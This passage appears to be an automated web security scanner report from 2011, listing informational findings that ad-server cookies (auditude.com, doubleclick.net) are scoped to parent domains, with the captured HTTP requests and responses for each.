Set-Cookie: tr865258493_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:50:12 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 16:50:12 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>865258493</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.25. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917162428&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr351400423_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:23:17 GMT; Path=/; HttpOnly
Set-Cookie: tr351400423_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:23:17 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 16:23:17 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>351400423</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.26. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917171254&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1417410721_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:11:40 GMT; Path=/; HttpOnly
Set-Cookie: tr1417410721_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:11:40 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 17:11:40 GMT
Server: lighttpd/1.4.18
Content-Length: 2150

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1417410721</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>
...[SNIP]...
12.27. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917164624&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr968793795_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:45:11 GMT; Path=/; HttpOnly
Set-Cookie: tr968793795_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:45:11 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 16:45:11 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>968793795</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.28. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917170251&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr122313142_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:01:40 GMT; Path=/; HttpOnly
Set-Cookie: tr122313142_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:01:40 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 17:01:40 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>122313142</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.29. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917162955&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1191698689_1=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:42:09 GMT; Path=/; HttpOnly
Set-Cookie: tr1191698689_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:42:09 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 16:42:09 GMT
Server: lighttpd/1.4.18
Content-Length: 2150

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1191698689</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>
...[SNIP]...
12.30. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917171804&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr416961237_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:16:50 GMT; Path=/; HttpOnly
Set-Cookie: tr416961237_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:16:50 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 17:16:50 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>416961237</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.31. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917172321&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1544979727_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:22:06 GMT; Path=/; HttpOnly
Set-Cookie: tr1544979727_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:22:06 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 17:22:06 GMT
Server: lighttpd/1.4.18
Content-Length: 2150

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1544979727</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>
...[SNIP]...
12.32. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917170742&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1706248349_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:06:27 GMT; Path=/; HttpOnly
Set-Cookie: tr1706248349_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 18:06:27 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 17:06:27 GMT
Server: lighttpd/1.4.18
Content-Length: 2150

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1706248349</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>
...[SNIP]...
12.33. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.hearst.comOX2468/B5477179.4

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4478.hearst.comOX2468/B5477179.4;sz=1x1;pc=[TPAS_ID];ord=2323648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:27:46 GMT
Location: http://s0.2mdn.net/viewad/1782317/A_1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=ca9eb413c0000ea||t=1316276866|et=730|cs=002213fd48f6ce85e8915625c9; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:46 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:46 GMT
Server: GFE/2.0
Content-Type: text/html

12.34. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.87  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.hearst.comOX2468/B5477179.87

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4478.hearst.comOX2468/B5477179.87;sz=1x1;pc=[TPAS_ID];ord=2325304? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:28:07 GMT
Location: http://s0.2mdn.net/viewad/1782317/A_1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c87eb413c000042||t=1316276887|et=730|cs=002213fd4860b96821e9b9d240; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:07 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:07 GMT
Server: GFE/2.0
Content-Type: text/html

12.35. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.88  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.hearst.comOX2468/B5477179.88

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4478.hearst.comOX2468/B5477179.88;sz=1x1;pc=[TPAS_ID];ord=2322226? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:27:18 GMT
Location: http://s0.2mdn.net/viewad/1782317/A_1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cedeb413c000005||t=1316276838|et=730|cs=002213fd48cd6be19143dc9a0a; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:18 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:18 GMT
Server: GFE/2.0
Content-Type: text/html

12.36. http://ad.doubleclick.net/ad/N5823.131643.MEEBO/B5733109.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5823.131643.MEEBO/B5733109.2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N5823.131643.MEEBO/B5733109.2;sz=1x1;ord=2367085? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:36:47 GMT
Location: http://s0.2mdn.net/viewad/2505742/1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cb3fa413c000068||t=1316277407|et=730|cs=002213fd48d86c5ef92157bbd3; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:36:47 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:36:47 GMT
Server: GFE/2.0
Content-Type: text/html

12.37. http://ad.doubleclick.net/ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206;sz=300x250;ord=1316277325.637259? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:53:35 GMT
Location: http://s0.2mdn.net/viewad/2946429/Oktoberfest300x250.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c821b423c000055||t=1316278415|et=730|cs=002213fd4814bb2c0a90c0d894; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:35 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:35 GMT
Server: GFE/2.0
Content-Type: text/html

12.38. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316296524359&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5236
Set-Cookie: id=c0f63423c0000e0||t=1316280770|et=730|cs=002213fd48c5c0bcbe81bf4c62; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 17:32:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 17:32:50 GMT
Date: Sat, 17 Sep 2011 17:32:50 GMT
Expires: Sat, 17 Sep 2011 17:32:50 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
12.39. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.30

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917123525%3Bdct=;ord=1316277325? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6091
Set-Cookie: id=c3c1d423c000085||t=1316278409|et=730|cs=002213fd4820a643dfe50be397; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:29 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:29 GMT
Date: Sat, 17 Sep 2011 16:53:29 GMT
Expires: Sat, 17 Sep 2011 16:53:29 GMT
Cache-Control: private

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 12:28:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
12.40. http://ad.doubleclick.net/adj/DY146/ron_lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/DY146/ron_lifestyle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1877
Set-Cookie: id=c1600423c000022||t=1316277484|et=730|cs=002213fd48edd60cd1898eb29b; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:04 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:04 GMT
Date: Sat, 17 Sep 2011 16:38:04 GMT
Expires: Sat, 17 Sep 2011 16:38:04 GMT
Cache-Control: private

document.write('<SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad.doubleclick.net/adj/N4610.DBG/B5042149.10;sz=300x250;pc=[TPAS_ID];click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/d%3B24
...[SNIP]...
